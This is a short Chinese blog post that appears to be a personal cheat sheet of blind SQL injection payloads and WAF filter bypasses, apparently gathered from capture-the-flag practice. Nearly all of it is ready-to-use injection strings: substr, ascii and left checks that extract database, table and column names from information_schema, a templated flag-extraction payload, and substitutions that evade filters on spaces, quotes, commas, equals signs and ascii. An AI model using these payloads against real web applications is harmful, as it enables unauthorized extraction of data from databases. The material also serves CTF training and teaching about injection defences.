盲注绕过总结

最新推荐文章于 2024-03-29 10:10:01 发布

盖世大宝剑a

最新推荐文章于 2024-03-29 10:10:01 发布

阅读量190

点赞数

本文链接：https://blog.csdn.net/jie_a/article/details/117716534

版权

最近在各种师傅们的花式盲注下，惊呆了我和我的小伙伴
我觉得是时候总结一下了，下次直接套用，嘻嘻

基础盲注：

判断数据：
and substr((select 列名 from database().表名 limit 0,1),1,1)=‘z’
1’ascii(substr((select flag from flag ) ,{0},1))>{1}
id=1’ and left((select database()),1)=‘s’

left:从字符表达式最左边一个字符开始返回指定数目的字符

判断数据库库名长度：and length(database())>=1 4个长度，4个字符

length:字符串长度

判断数据库库名： and substr(database(),1,1)=‘t’
判断表名：and substr((select table_name from information_schema.tables where table_schema=‘database()’ limit 0,1),1,1)=‘u’
判断字段名：and substr((select column_name from information_schema.columns where table_schema=‘database()’ and table_name=‘表名’ limit 0,1),1,1)=‘i’

limit:返回数据中，从第…开始,查询…条

有了过滤的盲注

id=1^case(ord(substr(database()from(1)for(1))))when(102)then(2)else(3)end

过滤了空格可以用括号代替；
过滤了单引号可以用16进制代替；
过滤了逗号，对于substr可以用 substr(database() from 1 for 1 )代替substr(database(),1,1)
if中有逗号可以用case when代替if；
过滤了 ascii可以用ord代替；
过滤了等号和like可以用regexp代替。
明天再写总结…